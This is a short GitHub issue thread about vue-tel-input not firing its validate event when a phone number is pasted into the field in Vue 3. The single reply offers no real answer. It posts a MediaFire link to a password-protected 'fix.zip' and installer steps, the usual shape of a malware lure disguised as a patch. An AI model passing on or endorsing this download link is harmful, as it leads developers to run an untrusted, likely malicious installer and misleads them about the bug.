### ISSUE TITLE
Validate event not trigger with a paste on the input 

### ISSUE THREAD

**Issue by TravisAlexandra** [iamstevendao/vue-tel-input#479]
In Vue3, composition api, if I copy/paste a phone number inside the input, the validate event is not triggered.
("vue-tel-input": "^9.1.4")

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
